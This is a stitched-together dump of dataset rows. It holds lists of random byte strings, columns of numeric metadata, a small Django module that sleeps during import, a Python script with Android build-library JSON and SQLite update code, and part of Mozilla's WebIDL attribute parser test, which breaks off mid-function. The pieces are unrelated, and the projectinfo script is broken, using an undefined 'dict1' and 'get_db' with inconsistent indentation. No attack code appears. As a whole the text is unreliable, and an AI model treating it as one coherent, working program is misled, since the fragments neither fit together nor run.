b'\x1c\xdar\xc1\x18\x1f\x0b\xf3\xe2\xf0\xf1<\x05\x88\xa4\x01J,\xc2\xa1\xbd`L\x8b\x95\xa6\xbdze4&\xc1', b'>0\x01SdF=\x8c\xa7\x1d4\x1elOt\xcd;,|\xf0l\xe9O\x83\xf3\xc0rm\xb6\x82\xaa\x08', b'\xd0\xef\x12\xc5<\\\x00\x82$\x98\x8d\xb6\xa7l\xd6w\xa3\x00<D\x15\xf7\xd6\xc9\xd0\xfb\xd3\x9f\xed,\x9e\xf7', b'\xa6->\xb1\x80jz\xc3\x8a,5\xb8\xf8\xbf\xb4^\x880\x824A\xfa\xbf\x0e\x1f\x9b /\x02\xadhx', b''], [b"\xc1\x17\xa1{\x135'>\xce\x8a\xe8;\x84V\x8c\xfer\xdaZS\xc7v\xd7\x18\xfb\xe3\xbf\xff\x92\x87@D", b'\x06\xb9c\xad\x8d2\xc0WU\xaf"w\xe5>\x1a\xfd\x02\xf1\xdd\x91$h/\x02)\xc6\xd3\xbc\x17\xc42\xe8', b'\xc4\xa2\xb3*k\xa8\xc8\x124\x86\xa0\x9b\xad\xfa\xb9$5?\xc6\x0c]\x98Kb\xd13\xdb:\x85\xed\xe1[', b'%\xa4>aM\x08\xbet\x1b\xc8\xb5\xf2c.9o!\x03G\x99_\n\xef\x93OA^\xabC\x91\xce\x97', b'\xc9T\xc1\xf6\xc8\xbe\xd8h\x86\xfey\x82Evg\xe1zP\x9ct\x98(\x01\xf5\xfc\xf8\xbe\xf6\x1d\xc0\x15\x8e', b'\xd3\xf1\xe6T\xd7"\xba\xdeipC\xe5\xe1\x04\x0e?o\x84\xcb\x1aE\x18\xd0\xa36\x0eC\xc7D>\x12 ', b'\xe0\x06\x0c\xaf\xec\xe3op*j\xcd\x84\xef\x9b\x82a{,\x1c\x98\xba-\x10\xf9\x7f+\xb6\x8a/q,\xeb', b"\x8a'\xeb\x1a\xe8i\x91S\xf3;\xa8[f-\xb02\x01?\xac\xe4Ds\xd8E\xa0\x87\x8a\xec]\x9b?\x9e", b'\xcf\x0cM\xbd\x92\xbbaS\x9d\xd0:\x7f\xfe\xd5\x08\xac\xe4\xb5\x81ga\xc2>\\\x89\x95\x08\xd6C\xf9\xe6\xb7', b'\x9bh\xd3\xb0x\xf0\xfa5\xa6vV\x96_\x16\x9dx\x95B2\xa9\xcem\xc8\xb9\xaf\xb9\xff\n\xae\xc7\x14\x13', b'H\x03\x82\xd6\xbd\x00Z\r\xa03YQ\xa4\xfa\xcdl\xea8g{L\x16\x18\xca\xdb\xb75~\xff\x1b]&', b'A?l1\xbf\x04\xc3Qs\x9b\x08c\xc3|\xf5D6\xa2\x82\xf8\xd3\xf4@\xab\xa0oDx\xc4\xffY*', b'\x0c\xd7U\x880\xa0\xd3\xad\xdd\xda\xdb\x01\xac\x99ya:\xeb\xab8K%\xaf\xc4\xf1G\xd3*\xb7\xae\x01*', b'\xb8s\xab\x0e\xf4\x90\xdb\xce\x0b)l\xb3\x7f\xf1p\xc6&\x0eh\xfb\xc8\xd7\x88`\xcd\xdc\x97-l\xb6L\x82', b'x\xf2\x15\x85\xe9\x01\xd8\xdc\xc5\xbc\xb7\xda\xcd$\xf0\xae\xc9\x01\xcdHZ\xb8)\x97\x11\xff\xcc7\xa5\x98\xb4\xb6', b'\xf3\xb6\xdd\xe9\xb1\x93\x08A\xda\xa39\xfe$\x8dO\n$ Mn"-\'\xa5$F5\xae\xcd>\xa2\x0c', b''], [b'\x82\x8b\x9d\x85\x0b/\x83\xacmb\x07\x89h\xa5\x86R\x8e\xf4\xd9_\x00\t\xeb\xb3>\\@\x11\xecOp\x7f', b'', b'', b'"\xee\xd9\x89<\xc3_\xca\xe9\xed\xc2v\r,\x9e\x10\x1c\x07\xe8E\xbd\x10\x9a\x16_:hk\xb9Om\xf2', b'', b'', b'\x11]i\xb3t6\xabKF\xc0\xa9\x81z&\xdf\x02\xcaRQ\x82\x92\xac\xf1\xf9~\x94\x94tM9\xbe\x1a', b'\xd0dY\xbc\xbe\xe5\xa8\x93\xc8e\xbd\x15\xf8\xb6b\x9a+\xbeh\xeb\x9d\x85\x1f(\xee\xd5\xb2 \xf2\xea\xa1\xf2', b'', b'`\xa8\xcd0:I\xdd\xd7\xa1\xc9W\r\x00\xa6\x1b\x0cM\xbb8\xb0Z\x8b\xe2\x87\x16\x0f\x99U\xf7\xdf\xc4U', b'', b'\xbcR\x17x\x12Y\xf1r\xb9c\xf5\x17#\xcd\xdb\xd5\x1c0\xd2\xda~\x99a\x96\xd5k\xef\x94\x0f\xd0$\xcb', b'!\x16\xaee\xb5H7X\xd5\tA\xb5{\x98\x8f\x12\x0bX\x85K\x184\x04\xcf\x80\x17\xf81V\xbc\xed\x9c', b'\x00\x08C^\xb5\xcfb\xb3\x13\xf0\x95S\x8eyQ\xe8\xdf\x9bI\xfe\xa2\x9c\x91@_\x16\x9d\x82w,u\x86', b'6&\x99Z\xae\xe6r\xab\xec\xb3X\x87\\\x02\x99>\xfa\xebP:\xd5\xd2t\xe2p\xc7\xe2\xe0\x0e\x95\xf9D', b'\xcf\x7f\x99\x9a\x1c\x18\xa6\x9av\xe6\xa2\xd5\xb3E\x8aJ\x18\xa7\x8c\xc0\x07\xda\xe9\x0bi\r\t\x0f\x9b\x06\xf8S', b''], [b'\x07\x83C\xd1X\xdf\xddJ\xd4\xf2\x7f3+\n\x95\xb2\x89\xd2"\x9d\xc5S\xfb\xfc\x9ed\x8d\xd2\xd2\xe5\x99B', b'', b'', b'', b'', b'-m2\x00\xef\x95\xcd\xfe\xf8\x9e\x0b\xbf\xae\xd8\xb4\xd2\xa1*\xfde\xaa\xb1\x8a\xdd\x1d\x07\x03\xc7,<\xe8\xe7', b'', b'', b'', b'', b'', b'', b'', b'', b'', b'', b''], [b'8Z\xd0\xd47\x84\xe6\xe4S4ndG|\xac\xa3\x0f^7\xd5nv\x14\x9e\x98\x84\xe7\xc2\x97', b'\xf8D\x01\x80\xa0U\xbd\x1daQ\x97{bg,!\xc2uK\xbe\xeb;\x82x\xb2\xe0\xc3\x8e\xdc\xd9I\x84n\xe3b\x8b\xf1\xa0\x1e\x0b*\xd9p\xb3e\xa2\x17\xc4\x0b\xcf5\x82\xcb\xb4\xfc\xc1d-z]\xd7\xa8*\xe1\xe2x\xe0\x10\x12>'])
| 1,398.571429
| 9,403
| 0.700919
| 2,236
| 9,790
| 3.06127
| 0.306351
| 0.007889
| 0.006574
| 0.006428
| 0.019138
| 0.018408
| 0.018408
| 0.018408
| 0.018408
| 0.018408
| 0
| 0.213505
| 0.018284
| 9,790
| 6
| 9,404
| 1,631.666667
| 0.498699
| 0.017467
| 0
| 0
| 0
| 18
| 0.844514
| 0.823505
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ec0c61a5fceea21f629d2c368718e70bd0804a26
| 90
|
py
|
Python
|
polls/slow_import.py
|
mrfleap/django-turboreload
|
9c90ca9a46d54c421f18ff0dfcfd3e8805dd593d
|
[
"MIT"
] | null | null | null |
polls/slow_import.py
|
mrfleap/django-turboreload
|
9c90ca9a46d54c421f18ff0dfcfd3e8805dd593d
|
[
"MIT"
] | null | null | null |
polls/slow_import.py
|
mrfleap/django-turboreload
|
9c90ca9a46d54c421f18ff0dfcfd3e8805dd593d
|
[
"MIT"
] | null | null | null |
import time
print("Slow import starting")
time.sleep(0.05)
print("Slow import finished")
| 15
| 29
| 0.755556
| 14
| 90
| 4.857143
| 0.642857
| 0.264706
| 0.441176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0375
| 0.111111
| 90
| 5
| 30
| 18
| 0.8125
| 0
| 0
| 0
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
ec456a9461cfa53a2f0be8a212d2c2b9b280fe49
| 12,504
|
py
|
Python
|
projectinfo/test.py
|
lifecake/Project-build-info
|
6594c41933af3351d5ad62510cd84f004f675f9a
|
[
"Apache-2.0"
] | null | null | null |
projectinfo/test.py
|
lifecake/Project-build-info
|
6594c41933af3351d5ad62510cd84f004f675f9a
|
[
"Apache-2.0"
] | null | null | null |
projectinfo/test.py
|
lifecake/Project-build-info
|
6594c41933af3351d5ad62510cd84f004f675f9a
|
[
"Apache-2.0"
] | null | null | null |
import json
#
# {
# "applicationId":"com.neulion.f",
# "applicationName":"f",
# "applicationVersion":"8.0602",
# "librarys": [
# {
# "libraryName":"track-core",
# "libraryVersion":"6"
# },{
# "libraryName":"track-ga",
# "libraryVersion":"6"
# },{
# "libraryName":"player",
# "libraryVersion":"5.0.0"
# }
# ]
# }
tempdata = [{"package":"com.neulion.firetv.ufc.android.amazon.dev","packageName":"ufc-tv","productFlavorName":"amazon","packageVersionCode":"103","packageVersionName":"8.0613","packageTargetSdk":"27","packageMiniSdk":"21","deepLinkScheme":"amazon_ufctv","packageMappingUrl":"","libraryCoordinateList":[{"group":"com.android.tools.lint","name":"lint-gradle","currentVersion":"26.1.2"},{"group":"org.jetbrains.kotlin","name":"kotlin-annotation-processing-gradle","currentVersion":"1.2.41"},{"group":"com.crashlytics.sdk.android","name":"crashlytics","currentVersion":"2.8.0"},{"group":"com.squareup.leakcanary","name":"leakcanary-android","currentVersion":"1.5.4"},{"group":"com.squareup.leakcanary","name":"leakcanary-android-no-op","currentVersion":"1.5.4"},{"group":"org.jetbrains.kotlin","name":"kotlin-stdlib-jdk8","currentVersion":"1.2.41"},{"group":"com.google.android.gms","name":"play-services-analytics","currentVersion":"11.8.0"},{"group":"com.android.databinding","name":"baseLibrary","currentVersion":"3.1.2"},{"group":"com.neulion.android.app","name":"core","currentVersion":"0.5.3-SNAPSHOT"},{"group":"com.neulion.android.iap","name":"iap-amazon","currentVersion":"2.1.0-SNAPSHOT"},{"group":"android.arch.lifecycle","name":"extensions","currentVersion":"1.1.1"},{"group":"com.android.support","name":"support-annotations","currentVersion":"27.0.2"},{"group":"com.android.databinding","name":"adapters","currentVersion":"3.1.2"},{"group":"com.android.support","name":"recyclerview-v7","currentVersion":"27.0.2"},{"group":"com.jakewharton","name":"butterknife-compiler","currentVersion":"8.8.1"},{"group":"com.neulion.android","name":"service-v5","currentVersion":"3.0.12"},{"group":"com.android.databinding","name":"library","currentVersion":"3.1.2"},{"group":"com.android.support","name":"appcompat-v7","currentVersion":"27.0.2"},{"group":"com.android.support","name":"leanback-v17","currentVersion":"27.0.2"},{"group":"com.android.databinding","name":"compiler","currentVersion":"3.1.2"},{"group":"com.jakewharton","name":"butterknife","currentVersion":"8.8.1"},{"group":"com.neulion.android.media","name":"NeuPlayer","currentVersion":"4.7.2-SNAPSHOT"},{"group":"com.android.support","name":"design","currentVersion":"27.0.2"},{"group":"com.android.support","name":"multidex-instrumentation","currentVersion":"1.0.2"},{"group":"com.android.support","name":"cardview-v7","currentVersion":"27.0.2"},{"group":"com.neulion.android.iap","name":"iap-google","currentVersion":"2.1.0-SNAPSHOT"},{"group":"com.neulion.android.tracking","name":"tracker-ga","currentVersion":"4.3.2"},{"group":"com.neulion.android","name":"uikit-fresco","currentVersion":"1.1.12-SNAPSHOT"},{"group":"com.neulion.android","name":"appengine","currentVersion":"2.4.0"},{"group":"com.android.support","name":"multidex","currentVersion":"1.0.2"},{"group":"com.android.support","name":"support-v4","currentVersion":"27.0.2"},{"group":"com.android.support.constraint","name":"constraint-layout","currentVersion":"1.1.0"},{"group":"uk.co.chrisjenx","name":"calligraphy","currentVersion":"2.3.0"},{"group":"com.neulion.android","name":"commonparser","currentVersion":"3.0.4"}]},{"package":"com.neulion.firetv.ufc.android.amazon.dev","packageName":"ufc-tv","productFlavorName":"google","packageVersionCode":"103","packageVersionName":"8.0613","packageTargetSdk":"27","packageMiniSdk":"21","deepLinkScheme":"google_ufctv","packageMappingUrl":"","libraryCoordinateList":[{"group":"com.android.tools.lint","name":"lint-gradle","currentVersion":"26.1.2"},{"group":"org.jetbrains.kotlin","name":"kotlin-annotation-processing-gradle","currentVersion":"1.2.41"},{"group":"com.crashlytics.sdk.android","name":"crashlytics","currentVersion":"2.8.0"},{"group":"com.squareup.leakcanary","name":"leakcanary-android","currentVersion":"1.5.4"},{"group":"com.squareup.leakcanary","name":"leakcanary-android-no-op","currentVersion":"1.5.4"},{"group":"org.jetbrains.kotlin","name":"kotlin-stdlib-jdk8","currentVersion":"1.2.41"},{"group":"com.google.android.gms","name":"play-services-analytics","currentVersion":"11.8.0"},{"group":"com.android.databinding","name":"baseLibrary","currentVersion":"3.1.2"},{"group":"com.neulion.android.app","name":"core","currentVersion":"0.5.3-SNAPSHOT"},{"group":"com.neulion.android.iap","name":"iap-amazon","currentVersion":"2.1.0-SNAPSHOT"},{"group":"android.arch.lifecycle","name":"extensions","currentVersion":"1.1.1"},{"group":"com.android.support","name":"support-annotations","currentVersion":"27.0.2"},{"group":"com.android.databinding","name":"adapters","currentVersion":"3.1.2"},{"group":"com.android.support","name":"recyclerview-v7","currentVersion":"27.0.2"},{"group":"com.jakewharton","name":"butterknife-compiler","currentVersion":"8.8.1"},{"group":"com.neulion.android","name":"service-v5","currentVersion":"3.0.12"},{"group":"com.android.databinding","name":"library","currentVersion":"3.1.2"},{"group":"com.android.support","name":"appcompat-v7","currentVersion":"27.0.2"},{"group":"com.android.support","name":"leanback-v17","currentVersion":"27.0.2"},{"group":"com.android.databinding","name":"compiler","currentVersion":"3.1.2"},{"group":"com.jakewharton","name":"butterknife","currentVersion":"8.8.1"},{"group":"com.neulion.android.media","name":"NeuPlayer","currentVersion":"4.7.2-SNAPSHOT"},{"group":"com.android.support","name":"design","currentVersion":"27.0.2"},{"group":"com.android.support","name":"multidex-instrumentation","currentVersion":"1.0.2"},{"group":"com.android.support","name":"cardview-v7","currentVersion":"27.0.2"},{"group":"com.neulion.android.iap","name":"iap-google","currentVersion":"2.1.0-SNAPSHOT"},{"group":"com.neulion.android.tracking","name":"tracker-ga","currentVersion":"4.3.2"},{"group":"com.neulion.android","name":"uikit-fresco","currentVersion":"1.1.12-SNAPSHOT"},{"group":"com.neulion.android","name":"appengine","currentVersion":"2.4.0"},{"group":"com.android.support","name":"multidex","currentVersion":"1.0.2"},{"group":"com.android.support","name":"support-v4","currentVersion":"27.0.2"},{"group":"com.android.support.constraint","name":"constraint-layout","currentVersion":"1.1.0"},{"group":"uk.co.chrisjenx","name":"calligraphy","currentVersion":"2.3.0"},{"group":"com.neulion.android","name":"commonparser","currentVersion":"3.0.4"}]},{"package":"com.neulion.firetv.ufc.android.amazon.dev","packageName":"ufc-tv","productFlavorName":"prod","packageVersionCode":"103","packageVersionName":"8.0613","packageTargetSdk":"27","packageMiniSdk":"21","deepLinkScheme":"prod_ufctv","packageMappingUrl":"","libraryCoordinateList":[{"group":"com.android.tools.lint","name":"lint-gradle","currentVersion":"26.1.2"},{"group":"org.jetbrains.kotlin","name":"kotlin-annotation-processing-gradle","currentVersion":"1.2.41"},{"group":"com.crashlytics.sdk.android","name":"crashlytics","currentVersion":"2.8.0"},{"group":"com.squareup.leakcanary","name":"leakcanary-android","currentVersion":"1.5.4"},{"group":"com.squareup.leakcanary","name":"leakcanary-android-no-op","currentVersion":"1.5.4"},{"group":"org.jetbrains.kotlin","name":"kotlin-stdlib-jdk8","currentVersion":"1.2.41"},{"group":"com.google.android.gms","name":"play-services-analytics","currentVersion":"11.8.0"},{"group":"com.android.databinding","name":"baseLibrary","currentVersion":"3.1.2"},{"group":"com.neulion.android.app","name":"core","currentVersion":"0.5.3-SNAPSHOT"},{"group":"com.neulion.android.iap","name":"iap-amazon","currentVersion":"2.1.0-SNAPSHOT"},{"group":"android.arch.lifecycle","name":"extensions","currentVersion":"1.1.1"},{"group":"com.android.support","name":"support-annotations","currentVersion":"27.0.2"},{"group":"com.android.databinding","name":"adapters","currentVersion":"3.1.2"},{"group":"com.android.support","name":"recyclerview-v7","currentVersion":"27.0.2"},{"group":"com.jakewharton","name":"butterknife-compiler","currentVersion":"8.8.1"},{"group":"com.neulion.android","name":"service-v5","currentVersion":"3.0.12"},{"group":"com.android.databinding","name":"library","currentVersion":"3.1.2"},{"group":"com.android.support","name":"appcompat-v7","currentVersion":"27.0.2"},{"group":"com.android.support","name":"leanback-v17","currentVersion":"27.0.2"},{"group":"com.android.databinding","name":"compiler","currentVersion":"3.1.2"},{"group":"com.jakewharton","name":"butterknife","currentVersion":"8.8.1"},{"group":"com.neulion.android.media","name":"NeuPlayer","currentVersion":"4.7.2-SNAPSHOT"},{"group":"com.android.support","name":"design","currentVersion":"27.0.2"},{"group":"com.android.support","name":"multidex-instrumentation","currentVersion":"1.0.2"},{"group":"com.android.support","name":"cardview-v7","currentVersion":"27.0.2"},{"group":"com.neulion.android.iap","name":"iap-google","currentVersion":"2.1.0-SNAPSHOT"},{"group":"com.neulion.android.tracking","name":"tracker-ga","currentVersion":"4.3.2"},{"group":"com.neulion.android","name":"uikit-fresco","currentVersion":"1.1.12-SNAPSHOT"},{"group":"com.neulion.android","name":"appengine","currentVersion":"2.4.0"},{"group":"com.android.support","name":"multidex","currentVersion":"1.0.2"},{"group":"com.android.support","name":"support-v4","currentVersion":"27.0.2"},{"group":"com.android.support.constraint","name":"constraint-layout","currentVersion":"1.1.0"},{"group":"uk.co.chrisjenx","name":"calligraphy","currentVersion":"2.3.0"},{"group":"com.neulion.android","name":"commonparser","currentVersion":"3.0.4"}]}]
print(type(tempdata))
print(len(tempdata))
for data in tempdata:
print(data)
print(type(data))
db = get_db()
error = None
if dict1['package'] is None:
error = 'Missing package'
elif dict1['packageName'] is None:
error = 'Missing packageName'
elif dict1['packageVersionCode'] is None:
error = 'Missing packageVersionCode'
elif dict1['libraryCoordinateList'] is None:
error = 'Missing Library info'
# if already exist just update.
elif db.execute(
'SELECT package, packageVersionName, productFlavorName FROM Package WHERE package = ? and '
'packageVersionName = ? and productFlavorName = ?',
(dict1['package'], dict1['packageVersionName'], dict1['productFlavorName'])).fetchone() is not None:
# print('Found')
db.execute(
'UPDATE Package SET packageName = ?, packageVersionCode = ?,productFlavorName = ?, packageTargetSdk = ?, '
'packageMiniSdk = ?, packageMappingUrl = ?, deepLinkScheme = ? WHERE package = ? and '
'packageVersionName = ?', (dict1['packageName'], dict1['packageVersionCode'], dict1['productFlavorName'],
dict1['packageTargetSdk'], dict1['packageMiniSdk'],
dict1['packageMappingUrl'], dict1['deepLinkScheme'], dict1['package'],
dict1['packageVersionName'])
)
db.execute(
'UPDATE Package SET date = datetime(\'now\', \'localtime\') WHERE package = ? and '
'packageVersionName = ?', (dict1['package'], dict1['packageVersionName'])
)
db.commit()
id = db.execute(
'select id from PackageLibrary WHERE package = ? and packageVersionName = ? and productFlavorName = ?',
(dict1['package'], dict1['packageVersionName'], dict1['productFlavorName']))
pids = [dict(id=row[0]) for row in id.fetchall()]
ids = []
for item in pids:
ids.append(item['id'])
# print(ids)
i = 0
for dict2 in dict1['libraryCoordinateList']:
db.execute(
'UPDATE PackageLibrary SET package = ?, packageName = ?, productFlavorName = ?, packageVersionName = ?, '
'libraryGroup = ?, libraryName = ?, libraryVersion = ? WHERE package = ? and '
'packageVersionName = ? and id = ?', (dict1['package'], dict1['packageName'], dict1['productFlavorName'],
dict1['packageVersionName'], dict2['group'],
dict2['name'], dict2['currentVersion'],
dict1['package'], dict1['packageVersionName'],
ids[i])
)
db.commit()
i = i + 1
# print('Update')
error = 'Project Info Updated'
# print(error)
# insert new data
| 142.090909
| 9,437
| 0.678183
| 1,483
| 12,504
| 5.715442
| 0.11261
| 0.084946
| 0.079637
| 0.077867
| 0.83412
| 0.807102
| 0.807102
| 0.807102
| 0.807102
| 0.807102
| 0
| 0.038409
| 0.06302
| 12,504
| 87
| 9,438
| 143.724138
| 0.685046
| 0.035029
| 0
| 0.090909
| 0
| 0
| 0.703322
| 0.140781
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.018182
| 0
| 0.018182
| 0.072727
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6b6142b6243371bed9fd9e9b448dcf232f11c4b5
| 12,541
|
py
|
Python
|
B2G/gecko/dom/bindings/parser/tests/test_attr.py
|
wilebeast/FireFox-OS
|
43067f28711d78c429a1d6d58c77130f6899135f
|
[
"Apache-2.0"
] | 3
|
2015-08-31T15:24:31.000Z
|
2020-04-24T20:31:29.000Z
|
B2G/gecko/dom/bindings/parser/tests/test_attr.py
|
wilebeast/FireFox-OS
|
43067f28711d78c429a1d6d58c77130f6899135f
|
[
"Apache-2.0"
] | null | null | null |
B2G/gecko/dom/bindings/parser/tests/test_attr.py
|
wilebeast/FireFox-OS
|
43067f28711d78c429a1d6d58c77130f6899135f
|
[
"Apache-2.0"
] | 3
|
2015-07-29T07:17:15.000Z
|
2020-11-04T06:55:37.000Z
|
import WebIDL
def WebIDLTest(parser, harness):
testData = [("::TestAttr%s::b", "b", "Byte%s", False),
("::TestAttr%s::rb", "rb", "Byte%s", True),
("::TestAttr%s::o", "o", "Octet%s", False),
("::TestAttr%s::ro", "ro", "Octet%s", True),
("::TestAttr%s::s", "s", "Short%s", False),
("::TestAttr%s::rs", "rs", "Short%s", True),
("::TestAttr%s::us", "us", "UnsignedShort%s", False),
("::TestAttr%s::rus", "rus", "UnsignedShort%s", True),
("::TestAttr%s::l", "l", "Long%s", False),
("::TestAttr%s::rl", "rl", "Long%s", True),
("::TestAttr%s::ul", "ul", "UnsignedLong%s", False),
("::TestAttr%s::rul", "rul", "UnsignedLong%s", True),
("::TestAttr%s::ll", "ll", "LongLong%s", False),
("::TestAttr%s::rll", "rll", "LongLong%s", True),
("::TestAttr%s::ull", "ull", "UnsignedLongLong%s", False),
("::TestAttr%s::rull", "rull", "UnsignedLongLong%s", True),
("::TestAttr%s::str", "str", "String%s", False),
("::TestAttr%s::rstr", "rstr", "String%s", True),
("::TestAttr%s::obj", "obj", "Object%s", False),
("::TestAttr%s::robj", "robj", "Object%s", True),
("::TestAttr%s::object", "object", "Object%s", False),
("::TestAttr%s::f", "f", "Float%s", False),
("::TestAttr%s::rf", "rf", "Float%s", True)]
parser.parse("""
interface TestAttr {
attribute byte b;
readonly attribute byte rb;
attribute octet o;
readonly attribute octet ro;
attribute short s;
readonly attribute short rs;
attribute unsigned short us;
readonly attribute unsigned short rus;
attribute long l;
readonly attribute long rl;
attribute unsigned long ul;
readonly attribute unsigned long rul;
attribute long long ll;
readonly attribute long long rll;
attribute unsigned long long ull;
readonly attribute unsigned long long rull;
attribute DOMString str;
readonly attribute DOMString rstr;
attribute object obj;
readonly attribute object robj;
attribute object _object;
attribute float f;
readonly attribute float rf;
};
interface TestAttrNullable {
attribute byte? b;
readonly attribute byte? rb;
attribute octet? o;
readonly attribute octet? ro;
attribute short? s;
readonly attribute short? rs;
attribute unsigned short? us;
readonly attribute unsigned short? rus;
attribute long? l;
readonly attribute long? rl;
attribute unsigned long? ul;
readonly attribute unsigned long? rul;
attribute long long? ll;
readonly attribute long long? rll;
attribute unsigned long long? ull;
readonly attribute unsigned long long? rull;
attribute DOMString? str;
readonly attribute DOMString? rstr;
attribute object? obj;
readonly attribute object? robj;
attribute object? _object;
attribute float? f;
readonly attribute float? rf;
};
interface TestAttrArray {
attribute byte[] b;
readonly attribute byte[] rb;
attribute octet[] o;
readonly attribute octet[] ro;
attribute short[] s;
readonly attribute short[] rs;
attribute unsigned short[] us;
readonly attribute unsigned short[] rus;
attribute long[] l;
readonly attribute long[] rl;
attribute unsigned long[] ul;
readonly attribute unsigned long[] rul;
attribute long long[] ll;
readonly attribute long long[] rll;
attribute unsigned long long[] ull;
readonly attribute unsigned long long[] rull;
attribute DOMString[] str;
readonly attribute DOMString[] rstr;
attribute object[] obj;
readonly attribute object[] robj;
attribute object[] _object;
attribute float[] f;
readonly attribute float[] rf;
};
interface TestAttrNullableArray {
attribute byte[]? b;
readonly attribute byte[]? rb;
attribute octet[]? o;
readonly attribute octet[]? ro;
attribute short[]? s;
readonly attribute short[]? rs;
attribute unsigned short[]? us;
readonly attribute unsigned short[]? rus;
attribute long[]? l;
readonly attribute long[]? rl;
attribute unsigned long[]? ul;
readonly attribute unsigned long[]? rul;
attribute long long[]? ll;
readonly attribute long long[]? rll;
attribute unsigned long long[]? ull;
readonly attribute unsigned long long[]? rull;
attribute DOMString[]? str;
readonly attribute DOMString[]? rstr;
attribute object[]? obj;
readonly attribute object[]? robj;
attribute object[]? _object;
attribute float[]? f;
readonly attribute float[]? rf;
};
interface TestAttrArrayOfNullableTypes {
attribute byte?[] b;
readonly attribute byte?[] rb;
attribute octet?[] o;
readonly attribute octet?[] ro;
attribute short?[] s;
readonly attribute short?[] rs;
attribute unsigned short?[] us;
readonly attribute unsigned short?[] rus;
attribute long?[] l;
readonly attribute long?[] rl;
attribute unsigned long?[] ul;
readonly attribute unsigned long?[] rul;
attribute long long?[] ll;
readonly attribute long long?[] rll;
attribute unsigned long long?[] ull;
readonly attribute unsigned long long?[] rull;
attribute DOMString?[] str;
readonly attribute DOMString?[] rstr;
attribute object?[] obj;
readonly attribute object?[] robj;
attribute object?[] _object;
attribute float?[] f;
readonly attribute float?[] rf;
};
interface TestAttrNullableArrayOfNullableTypes {
attribute byte?[]? b;
readonly attribute byte?[]? rb;
attribute octet?[]? o;
readonly attribute octet?[]? ro;
attribute short?[]? s;
readonly attribute short?[]? rs;
attribute unsigned short?[]? us;
readonly attribute unsigned short?[]? rus;
attribute long?[]? l;
readonly attribute long?[]? rl;
attribute unsigned long?[]? ul;
readonly attribute unsigned long?[]? rul;
attribute long long?[]? ll;
readonly attribute long long?[]? rll;
attribute unsigned long long?[]? ull;
readonly attribute unsigned long long?[]? rull;
attribute DOMString?[]? str;
readonly attribute DOMString?[]? rstr;
attribute object?[]? obj;
readonly attribute object?[]? robj;
attribute object?[]? _object;
attribute float?[]? f;
readonly attribute float?[]? rf;
};
""")
results = parser.finish()
def checkAttr(attr, QName, name, type, readonly):
harness.ok(isinstance(attr, WebIDL.IDLAttribute),
"Should be an IDLAttribute")
harness.ok(attr.isAttr(), "Attr is an Attr")
harness.ok(not attr.isMethod(), "Attr is not an method")
harness.ok(not attr.isConst(), "Attr is not a const")
harness.check(attr.identifier.QName(), QName, "Attr has the right QName")
harness.check(attr.identifier.name, name, "Attr has the right name")
harness.check(str(attr.type), type, "Attr has the right type")
harness.check(attr.readonly, readonly, "Attr's readonly state is correct")
harness.ok(True, "TestAttr interface parsed without error.")
harness.check(len(results), 6, "Should be six productions.")
iface = results[0]
harness.ok(isinstance(iface, WebIDL.IDLInterface),
"Should be an IDLInterface")
harness.check(iface.identifier.QName(), "::TestAttr", "Interface has the right QName")
harness.check(iface.identifier.name, "TestAttr", "Interface has the right name")
harness.check(len(iface.members), len(testData), "Expect %s members" % len(testData))
attrs = iface.members
for i in range(len(attrs)):
data = testData[i]
attr = attrs[i]
(QName, name, type, readonly) = data
checkAttr(attr, QName % "", name, type % "", readonly)
iface = results[1]
harness.ok(isinstance(iface, WebIDL.IDLInterface),
"Should be an IDLInterface")
harness.check(iface.identifier.QName(), "::TestAttrNullable", "Interface has the right QName")
harness.check(iface.identifier.name, "TestAttrNullable", "Interface has the right name")
harness.check(len(iface.members), len(testData), "Expect %s members" % len(testData))
attrs = iface.members
for i in range(len(attrs)):
data = testData[i]
attr = attrs[i]
(QName, name, type, readonly) = data
checkAttr(attr, QName % "Nullable", name, type % "OrNull", readonly)
iface = results[2]
harness.ok(isinstance(iface, WebIDL.IDLInterface),
"Should be an IDLInterface")
harness.check(iface.identifier.QName(), "::TestAttrArray", "Interface has the right QName")
harness.check(iface.identifier.name, "TestAttrArray", "Interface has the right name")
harness.check(len(iface.members), len(testData), "Expect %s members" % len(testData))
attrs = iface.members
for i in range(len(attrs)):
data = testData[i]
attr = attrs[i]
(QName, name, type, readonly) = data
checkAttr(attr, QName % "Array", name, type % "Array", readonly)
iface = results[3]
harness.ok(isinstance(iface, WebIDL.IDLInterface),
"Should be an IDLInterface")
harness.check(iface.identifier.QName(), "::TestAttrNullableArray", "Interface has the right QName")
harness.check(iface.identifier.name, "TestAttrNullableArray", "Interface has the right name")
harness.check(len(iface.members), len(testData), "Expect %s members" % len(testData))
attrs = iface.members
for i in range(len(attrs)):
data = testData[i]
attr = attrs[i]
(QName, name, type, readonly) = data
checkAttr(attr, QName % "NullableArray", name, type % "ArrayOrNull", readonly)
iface = results[4]
harness.ok(isinstance(iface, WebIDL.IDLInterface),
"Should be an IDLInterface")
harness.check(iface.identifier.QName(), "::TestAttrArrayOfNullableTypes", "Interface has the right QName")
harness.check(iface.identifier.name, "TestAttrArrayOfNullableTypes", "Interface has the right name")
harness.check(len(iface.members), len(testData), "Expect %s members" % len(testData))
attrs = iface.members
